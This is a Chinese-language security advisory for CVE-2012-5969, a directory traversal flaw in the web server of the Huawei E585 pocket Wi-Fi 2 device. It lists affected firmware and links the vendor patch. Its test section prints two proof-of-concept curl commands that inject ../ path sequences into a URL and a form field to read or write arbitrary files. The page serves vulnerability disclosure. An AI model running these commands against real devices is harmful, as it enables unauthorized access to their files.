Huawei E585 pocket wifi 2设备目录穿越漏洞（CVE-2012-5969）

发布日期：2012-12-13
更新日期：2012-12-15受影响系统：
Huawei E585u-82 V100R001C84B503SP02
Huawei E585u-82 V100R001C64B503
Huawei E585u-82 V100R001C402B102SP01
Huawei E585u-82 V100R001C361B102
Huawei E585u-82 V100R001C326B102SP02
Huawei E585u-82 V100R001C323B505SP03
Huawei E585u-82 V100R001C308B102SP01
Huawei E585u-82 V100R001C09B102SP02
Huawei E585u-82 V100R001B106D00SP96C240
Huawei E585u-82 V100R001B106D00SP01C426
Huawei E585u-82 V100R001B106D00SP01C17
Huawei E585u-82 E585
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56927
CVE（CAN） ID: CVE-2012-5969Huawei E585是高速无线网络访问的调制解调器。Huawei E585 pocket wifi 2设备没有正确限制文件的访问路径。攻击者可手动更改文件路径，以访问系统文件或将任意文件写入到系统。在调用系统接口之前，设备的Web服务器模块没有严格检查LAN端请求报文内包含的文件名和路径的合法性。厂商声明此漏洞仅可以从LAN端利用，无法从WAN端利用。<*来源：John Bird

链接：http://www.kb.cert.org/vuls/id/871148
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-198239.htm
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！curl -X GET http://192.168.1.1/sdcard/..%2f..%2f"$1"
curl -X POST -d "action=request_page&page=sms.asp&req_page=../../../$1" http://192.168.1.1/en/sms.cgi建议：
--------------------------------------------------------------------------------
厂商补丁：Huawei
------
Huawei已经为此发布了一个安全公告（hw-198239）以及相应补丁:hw-198239：Security Advisory-Web server vulnerabilities on Huawei E585 pocket Wi-Fi 2 device链接：http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-198239.htm补丁下载：http://www.huaweidevice.com/Cisco Wireless LAN Controller web_auth_custom.html拒绝服务漏洞（CVE-2012-5991）MyBB Tips Of The Day插件SQL注入和HTML注入漏洞相关资讯目录穿越漏洞

VMware View Connection Server和（12/17/2012 19:58:37）
InduSoft Web Studio NTWebServer （10/12/2012 19:47:25）
Sitecom MD-253/MD-254目录穿越漏（09/05/2012 06:19:23）

JsUpload "/tmp/uploader"目录穿越（12/04/2012 06:49:08）
Conceptronic CH3ENAS目录穿越漏洞（09/06/2012 06:16:29）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任